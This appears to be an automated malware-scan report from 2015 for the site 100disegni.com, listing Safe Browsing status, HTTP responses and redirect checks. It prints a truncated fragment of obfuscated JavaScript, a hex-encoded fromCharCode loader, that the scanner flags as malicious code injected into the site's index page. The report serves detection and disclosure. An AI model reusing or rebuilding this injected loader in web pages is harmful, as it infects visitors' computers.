Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=100disegni.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://100disegni.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 27 Feb 2015 10:08:07 GMT Location: http://www.100disegni.com/ Server: Apache Content-Length: 234 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.100disegni.com/ | HTTP/1.1 200 OK Date: Fri, 27 Feb 2015 10:08:08 GMT Accept-Ranges: bytes ETag: "1ee9c2b43bc0ce1:4ba642" Server: Microsoft-IIS/6.0 Content-Length: 6560 Content-Location: http://www.100disegni.com/index.htm Content-Type: text/html Last-Modified: Thu, 03 Oct 2013 13:23:10 GMT MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET | clean |
http://www.100disegni.com/index.htm | 200 OK Content-Length: 6560 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function czabzf(){icvlwo=function(){--(sqohdb.body)}()}wsj="fr"+"om"+"Ch"+"ar"+"Co"+"de";if(document.querySelector)ndk=4;bvhlog=("65,ab,ba,b3,a8,b9,ae,b4,b3,65,bb,a7,b5,b6,b8,75,7e,6d,6e,65,c0,52,4f,65,bb,a6,b7,65,b8,b9,a6,b9,ae,a8,82,6c,a6,af,a6,bd,6c,80,52,4f,65,bb,a6,b7,65,a8,b4,b3,b9,b7,b4,b1,b1,aa,b7,82,6c,ae,b3,a9,aa,bd,73,b5,ad,b5,6c,80,52,4f,65,bb,a6,b7,65,bb,a7,b5,b6,b8,65,82,65,a9,b4,a8,ba,b2,aa,b3,b9,73,a8,b7,aa,a6,b9,aa,8a,b1,aa,b2,aa,b3,b9,6d,6c,ae,ab,b7,a6,b2,aa,6c,6e,80,52,4f,52,4 Antivirus reports:
| ||
http://www.100disegni.com/xfade2.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://www.100disegni.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 100disegni.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 27 Feb 2015 10:08:07 GMT
Location: http://www.100disegni.com/
Server: Apache
Content-Length: 234
Content-Type: text/html; charset=iso-8859-1
...234 bytes of data.
GET / HTTP/1.1
Host: 100disegni.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 27 Feb 2015 10:08:07 GMT
Location: http://www.100disegni.com/
Server: Apache
Content-Length: 234
Content-Type: text/html; charset=iso-8859-1
...234 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: 100disegni.com
Referer: http://www.google.com/search?q=100disegni.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 100disegni.com
Referer: http://www.google.com/search?q=100disegni.com
Result:
The result is similar to the first query. There are no suspicious redirects found.